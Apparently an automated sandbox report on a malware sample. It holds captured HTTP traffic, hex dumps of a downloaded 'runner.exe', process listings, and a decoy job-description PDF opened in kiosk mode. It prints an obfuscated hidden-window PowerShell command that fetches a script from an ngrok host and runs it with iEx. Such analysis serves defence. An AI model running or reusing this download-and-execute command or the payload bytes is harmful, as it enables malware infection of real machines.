                                                                                                                                                                                                                                                                  2024-12-19 12:44:38 UTC370OUTGET /cd/0/get/CgjvtlSAZk_sh5IGhdTnIMo7mcgDrrSEyte5G-tVhYFgNTdHl2CFSs9Wh3ng2uo8eQlVPvNYYdJc2HCeE8yuMunb9cYhZzTA-a7IwcEm4yoLOWrZNcdlrkrpNKZmWpGX7Itm3aKjcBJ9qjUwGeoAlcNR/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: uc4dbae793261c4ce4dfc5ef2aef.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:39 UTC738INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="runner.exe"; filename*=UTF-8''runner.exe
                                                                                                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                  Etag: 1734611873193801d
                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Server-Response-Time: 202
                                                                                                                                                                                                                                                                  X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:38 GMT
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                  Content-Length: 2949120
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: ffb5d0b59dc441178b301ec087a3bedb
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:39 UTC15646INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 15 0f d0 df 51 6e be 8c 51 6e be 8c 51 6e be 8c 1a 16 bd 8d 40 6e be 8c 1a 16 bb 8d 91 6e be 8c d1 15 ba 8d 43 6e be 8c d1 15 bd 8d 47 6e be 8c d1 15 bb 8d 0a 6e be 8c df 15 bb 8d 57 6e be 8c 1a 16 ba 8d 4b 6e be 8c 1a 16 b8 8d 50 6e be 8c 1a 16 bf 8d 4c 6e be 8c 51 6e bf 8c 71 6f be 8c df 15 b7 8d 0a 6e be 8c df 15 41 8c 50 6e be 8c 51 6e 29 8c 50 6e be 8c df 15 bc 8d 50 6e be
                                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$QnQnQn@nnCnGnnWnKnPnLnQnqonAPnQn)PnPn
                                                                                                                                                                                                                                                                  2024-12-19 12:44:39 UTC16384INData Raw: 8b e5 5d c3 e8 0a 4d 07 00 cc cc cc cc cc cc cc cc cc c2 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 10 76 49 00 64 a1 00 00 00 00 50 51 56 a1 14 40 4c 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 64 a1 2c 00 00 00 8b 08 a1 a0 9e 4c 00 3b 81 04 00 00 00 0f 8e 4d 01 00 00 68 a0 9e 4c 00 e8 63 54 06 00 83 c4 04 83 3d a0 9e 4c 00 ff 0f 85 33 01 00 00 6a 40 6a 00 68 60 9e 4c 00 c7 45 fc 00 00 00 00 e8 04 72 06 00 83 c4 0c c7 05 64 9e 4c 00 00 00 00 00 c7 05 68 9e 4c 00 00 00 00 00 6a 2c e8 0e 50 06 00 83 c4 04 89 00 89 40 04 89 40 08 66 c7 40 0c 01 01 a3 64 9e 4c 00 c6 45 fc 01 b9 70 9e 4c 00 6a 20 68 c8 fa 4a 00 c7 05 70 9e 4c 00 00 00 00 00 c7 05 80 9e 4c 00 00 00 00 00 c7 05 84 9e 4c 00 00 00 00 00 e8 4d d6 ff ff 33 c0 c7 05 88 9e 4c 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: ]MUjhvIdPQV@L3PEdd,L;MhLcT=L3j@jh`LErdLhLj,P@@f@dLEpLj hJpLLLM3L
                                                                                                                                                                                                                                                                  2024-12-19 12:44:39 UTC738INData Raw: 07 00 00 00 66 89 8d cc fd ff ff 84 c0 0f 84 a0 03 00 00 0f 57 c0 89 8d f8 fc ff ff 66 0f d6 85 54 fd ff ff 89 8d 54 fd ff ff 89 8d 58 fd ff ff 89 8d 5c fd ff ff c6 45 fc 0d 6a 21 89 8d ec fc ff ff 89 8d 90 fd ff ff 89 8d a0 fd ff ff 89 8d a4 fd ff ff 8d 8d 90 fd ff ff 68 c8 09 4b 00 e8 de 96 ff ff 8d 85 ec fc ff ff c6 45 fc 0e 50 8d 85 f8 fc ff ff 8b cf 50 8d 85 90 fd ff ff 50 8d 85 d8 fd ff ff 50 e8 f7 a2 00 00 50 8d 8d 54 fd ff ff e8 bb 1b 00 00 8b 8d d8 fd ff ff 85 c9 74 58 8b 85 e0 fd ff ff 2b c1 c1 f8 02 8d 14 85 00 00 00 00 8b c1 81 fa 00 10 00 00 72 14 8b 48 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 ef 10 00 00 52 51 e8 12 10 06 00 83 c4 08 c7 85 d8 fd ff ff 00 00 00 00 c7 85 dc fd ff ff 00 00 00 00 c7 85 e0 fd ff ff 00 00 00 00 c6 45 fc 0d 8b 8d
                                                                                                                                                                                                                                                                  Data Ascii: fWfTTX\Ej!hKEPPPPPTtX+rH#+RQE
                                                                                                                                                                                                                                                                  2024-12-19 12:44:39 UTC16384INData Raw: 50 3b 8d b0 fd ff ff 74 0e e8 62 a9 ff ff 83 85 ac fd ff ff 18 eb 11 ff b5 ac fd ff ff 8d 8d a8 fd ff ff e8 58 a7 ff ff c6 45 fc 0d 8b 8d e0 fd ff ff 83 f9 08 72 35 8b 95 cc fd ff ff 8d 0c 4d 02 00 00 00 8b c2 81 f9 00 10 00 00 72 14 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 68 0e 00 00 51 52 e8 9f 0d 06 00 83 c4 08 83 85 ec fc ff ff 04 47 8b 8d 54 fd ff ff 3b bd f8 fc ff ff 0f 8c 0a fe ff ff c6 45 fc 0b 85 c9 0f 84 9a 00 00 00 8b 85 5c fd ff ff 8b 95 54 fd ff ff 2b c1 c1 f8 02 8d 0c 85 00 00 00 00 8b c2 81 f9 00 10 00 00 72 14 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 25 0e 00 00 51 52 e8 39 0d 06 00 eb 58 a1 88 8c 4c 00 85 c0 75 36 68 84 00 00 00 e8 f4 0c 06 00 8b f0 89 b5 e4 fd ff ff 68 84 00 00 00 6a 00 56 c6 45 fc 10 e8 b3 2e 06 00 83 c4
                                                                                                                                                                                                                                                                  Data Ascii: P;tbXEr5MrP#+hQRGT;E\T+rP#+%QR9XLu6hhjVE.
                                                                                                                                                                                                                                                                  2024-12-19 12:44:39 UTC16011INData Raw: 50 51 56 57 a1 14 40 4c 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f9 89 7d f0 8b 75 08 8d 47 04 0f 57 c0 c7 07 a4 f8 49 00 50 66 0f d6 00 8d 46 04 50 e8 44 e1 05 00 83 c4 08 c7 45 fc 00 00 00 00 8d 4f 10 c7 07 b4 1b 4b 00 8b 46 0c 89 47 0c 8d 46 10 50 e8 c7 6a ff ff c7 07 c4 12 4b 00 8b c7 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 1d 81 49 00 64 a1 00 00 00 00 50 51 56 57 a1 14 40 4c 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f9 89 7d f0 8b 75 08 8d 47 04 0f 57 c0 c7 07 a4 f8 49 00 50 66 0f d6 00 8d 46 04 50 e8 b4 e0 05 00 83 c4 08 c7 45 fc 00 00 00 00 8d 4f 10 c7 07 b4 1b 4b 00 8b 46 0c 89 47 0c 8d 46 10 50 e8 37 6a ff ff c7 07 0c 1c 4b 00 8b c7 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b
                                                                                                                                                                                                                                                                  Data Ascii: PQVW@L3PEd}uGWIPfFPDEOKFGFPjKMdY_^]UjhIdPQVW@L3PEd}uGWIPfFPEOKFGFP7jKMdY_^
                                                                                                                                                                                                                                                                  2024-12-19 12:44:39 UTC16384INData Raw: a1 00 00 00 00 50 83 ec 24 56 a1 14 40 4c 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 d8 89 75 d4 8d 4d dc 6a 37 68 28 19 4b 00 c7 45 dc 00 00 00 00 c7 45 ec 00 00 00 00 c7 45 f0 00 00 00 00 e8 ae a5 ff ff 0f 57 c0 c7 45 fc 00 00 00 00 66 0f d6 46 04 8d 45 dc c6 45 fc 01 50 8d 4e 10 c7 06 b4 1b 4b 00 c7 46 0c 00 00 00 00 e8 22 2c ff ff 8b 4d f0 c7 06 f0 1b 4b 00 83 f9 10 72 28 8b 55 dc 41 8b c2 81 f9 00 10 00 00 72 10 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 77 22 51 52 e8 d7 8e 05 00 83 c4 08 c7 06 88 0f 4b 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c3 e8 e0 8a 06 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 15 87 49 00 64 a1 00 00 00 00 50 83 ec 24 56 a1 14 40 4c 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75
                                                                                                                                                                                                                                                                  Data Ascii: P$V@L3PEduuMj7h(KEEEWEfFEEPNKF",MKr(UArP#+w"QRKMdY^]UjhIdP$V@L3PEdu
                                                                                                                                                                                                                                                                  2024-12-19 12:44:39 UTC16384INData Raw: 60 ea 4a 00 6a 1e 50 8b 76 34 8b ce ff 15 d4 e2 49 00 ff d6 83 c4 14 6a 24 e8 2f 4f 05 00 0f 57 c0 89 85 2c fd ff ff 83 c4 04 0f 11 00 0f 11 40 10 c7 40 20 00 00 00 00 c7 40 18 00 00 00 00 c7 00 00 00 00 00 c7 40 04 00 00 00 00 c7 40 08 00 00 00 00 c7 40 0c 00 00 00 00 c7 40 10 00 00 00 00 c7 40 14 00 00 00 00 33 c0 c7 45 c0 00 00 00 00 c7 45 d0 00 00 00 00 c7 45 d4 07 00 00 00 66 89 45 c0 89 45 fc 8d 4d c0 8b 85 28 fd ff ff 6a 01 68 a8 f2 4a 00 8b 30 8b 40 04 89 85 28 fd ff ff e8 df e3 fe ff 8b 85 20 fd ff ff 8b d0 83 78 14 08 72 02 8b 10 8b ca 8d 41 02 89 85 24 fd ff ff 0f 1f 40 00 66 8b 01 83 c1 02 66 85 c0 75 f5 2b 8d 24 fd ff ff d1 f9 51 52 8d 4d c0 e8 a3 e3 fe ff 6a 02 68 ac f2 4a 00 8d 4d c0 e8 94 e3 fe ff 3b b5 28 fd ff ff 74 53 83 7e 14 08 8b d6
                                                                                                                                                                                                                                                                  Data Ascii: `JjPv4Ij$/OW,@@ @@@@@@3EEEfEEM(jhJ0@( xrA$@ffu+$QRMjhJM;(tS~
                                                                                                                                                                                                                                                                  2024-12-19 12:44:39 UTC373INData Raw: 8b 40 04 c7 44 18 20 00 00 00 00 c7 44 18 24 00 00 00 00 75 03 83 ce 02 8b 03 6a 00 8b 48 04 b8 04 00 00 00 03 cb 8b 51 0c 0b d6 33 f6 39 71 38 0f 45 c6 0b c2 50 e8 aa 30 ff ff c7 45 fc 05 00 00 00 8b 7d cc 8b 07 8b 40 04 8b 7c 38 38 85 ff 74 11 8b 07 8b 70 08 8b ce ff 15 d4 e2 49 00 8b cf ff d6 8b c3 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 4c 8e 49 00 64 a1 00 00 00 00 50 83 ec 48 a1 14 40 4c 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 5d 08 8d 4d e8 6a 00 89 5d ec e8 7c fc 04 00 c7 45 fc 00 00 00 00 8b 35 c4 9e 4c 00 a1 58 9e 4c 00 89 45 e0 85 f6 75 2f 56 8d 4d e4 e8 5a fc 04 00 39 35 c4 9e 4c 00 75 10 a1 68 7e 4c 00 40 a3 68 7e 4c 00 a3 c4 9e 4c 00 8d 4d e4 e8 92
                                                                                                                                                                                                                                                                  Data Ascii: @D D$ujHQ39q8EP0E}@|88tpIMdY_^[]UjhLIdPH@L3ESVWPEd]Mj]|E5LXLEu/VMZ95Luh~L@h~LLM
                                                                                                                                                                                                                                                                  2024-12-19 12:44:39 UTC16384INData Raw: 8b f8 83 c4 04 89 7d e0 8b 45 ec 8b 40 04 85 c0 74 0c 8b 70 18 85 f6 75 0a 8d 70 1c eb 05 be ca 0c 4b 00 6a 00 8d 4d ac e8 9a fb 04 00 c7 45 b0 00 00 00 00 c6 45 b4 00 c7 45 b8 00 00 00 00 c6 45 bc 00 33 c0 c7 45 c0 00 00 00 00 66 89 45 c4 89 45 c8 66 89 45 cc 89 45 d0 88 45 d4 89 45 d8 88 45 dc c6 45 fc 08 85 f6 0f 84 e5 00 00 00 8d 45 ac 56 50 e8 3b fe 04 00 c7 47 04 00 00 00 00 c7 07 b8 06 4a 00 8d 45 ac c6 45 fc 09 50 e8 6c fe 04 00 8b 45 d8 83 c4 0c 85 c0 74 09 50 e8 df 09 06 00 83 c4 04 8b 45 d0 c7 45 d8 00 00 00 00 85 c0 74 09 50 e8 c8 09 06 00 83 c4 04 8b 45 c8 c7 45 d0 00 00 00 00 85 c0 74 09 50 e8 b1 09 06 00 83 c4 04 8b 45 c0 c7 45 c8 00 00 00 00 85 c0 74 09 50 e8 9a 09 06 00 83 c4 04 8b 45 b8 c7 45 c0 00 00 00 00 85 c0 74 09 50 e8 83 09 06 00
                                                                                                                                                                                                                                                                  Data Ascii: }E@tpupKjMEEEE3EfEEfEEEEEEEVP;GJEEPlEtPEEtPEEtPEEtPEEtP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:39 UTC16384INData Raw: 8b cf ff 15 d4 e2 49 00 8b cb ff d7 8b bd 74 ff ff ff 0f b7 c0 b9 ff ff 00 00 66 3b c8 74 09 c6 46 04 00 e9 0a ff ff ff c7 06 00 00 00 00 c6 46 04 01 e9 fb fe ff ff 85 c0 0f 85 a6 00 00 00 80 7e 04 00 75 07 8b ce e8 54 07 00 00 8b 85 68 ff ff ff 0f b7 5e 06 8b 00 8b 78 0c 8b cf ff 15 d4 e2 49 00 8b 8d 68 ff ff ff ff d7 66 3b d8 75 6f e8 70 2e 06 00 8b 8d 7c ff ff ff 8b 00 8a 00 88 01 41 8b 1e 89 8d 7c ff ff ff 85 db 74 47 8b 43 1c 83 38 00 74 1b 8b 4b 2c 8b 01 85 c0 7e 12 48 89 01 8b 4b 1c 8b 11 8d 42 02 89 01 0f b7 02 eb 14 8b 03 8b 78 1c 8b cf ff 15 d4 e2 49 00 8b cb ff d7 0f b7 c0 b9 ff ff 00 00 66 3b c8 74 06 c6 46 04 00 eb 0a c7 06 00 00 00 00 c6 46 04 01 8b bd 74 ff ff ff 83 bd 64 ff ff ff 00 0f 85 d9 00 00 00 80 7e 04 00 75 07 8b ce e8 a1 06 00 00
                                                                                                                                                                                                                                                                  Data Ascii: Itf;tFF~uTh^xIhf;uop.|A|tGC8tK,~HKBxIf;tFFtd~u


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  21192.168.2.5498353.124.142.2054439048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:45 UTC221OUTGET /metadata/f08a7638d48ba191b651003837c0a34d HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: 23glcrtmzxqgwfpq3oujitt.ngrok.pizza
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:46 UTC213INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 207
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:46 GMT
                                                                                                                                                                                                                                                                  Server: Werkzeug/3.0.3 Python/3.12.8
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:46 UTC207INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                                                                                                                                                                                                                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                                  Start time:07:44:02
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing)
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b4800000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                                  Start time:07:44:02
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                                  Start time:07:44:03
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing)
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                                  Start time:07:44:17
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                                  Start time:07:44:18
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                                  Start time:07:44:18
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                                  Start time:07:44:18
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2036,i,15400410564020983151,12558910162901878571,262144 /prefetch:3
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                                  Start time:07:44:19
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:3
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                                  Start time:07:44:23
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6388 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:8
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                                                  Start time:07:44:23
